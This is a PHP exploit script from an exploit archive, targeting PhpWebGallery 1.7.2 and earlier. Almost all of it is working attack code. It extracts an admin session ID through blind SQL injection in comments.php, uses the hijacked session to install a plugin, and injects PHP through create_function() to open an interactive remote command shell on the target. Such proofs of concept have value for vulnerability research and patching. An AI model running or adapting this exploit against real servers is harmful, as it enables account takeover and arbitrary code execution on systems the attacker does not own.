Home / exploits phpwebgallery-hijackexec.txt
Posted on 15 October 2008
<?php /* ------------------------------------------------------------------------ PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit ------------------------------------------------------------------------ author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.phpwebgallery.net/ details..: works with at least two rows in _comments table This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /plugins/event_tracer/event_list.php 60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1; 61. usort( 62. $events, 63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' ) 64. ); An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can access to the plugins management interface, but the attacker might be able to retrieve a valid admin session id using the SQL injection bug in comments.php (see lines 325-340) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout",5); define(STDIN, fopen("php://stdin", "r")); define(PATTERN, "/<span class="author">(.*)</span> -/"); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again... "; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function check_target() { global $host, $path, $prefix, $default_record; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id=".md5("foo")." "; $packet .= "Connection: close "; preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); $prefix = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); $default_record = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); if (!strlen($default_record) || $default_record == $match[1]) die(" [-] Exploit failed... "); } function encodeSQL($sql) { for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); return "CONCAT(0x{$encoded})"; } function get_sid() { global $host, $path, $prefix, $default_record; $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z $index = 1; $sid = ""; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id=".md5("foo")." "; $packet .= "Connection: close "; print " [-] Fetching admin SID: "; while (!strpos($sid, chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die(" [-] Exploit failed...try later! "); $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions". "/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*"; preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print " "; return $sid; } function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id={$sid} "; $packet .= "Connection: close "; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } } print " +---------------------------------------------------------------------------+"; print " | PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; print " +---------------------------------------------------------------------------+ "; if ($argc < 3) { print " Usage...: php $argv[0] host path [sid] "; print " host....: target server (ip/hostname)"; print " path....: path to PhpWebGallery directory"; print " sid.....: a valid admin session id "; die(); } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = (isset($argv[3])) ? $argv[3] : get_sid(); check_plugin(); $code = "0];}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id={$sid} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " phpwebgallery-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die(" [-] Exploit failed... "); } else break; } ?>
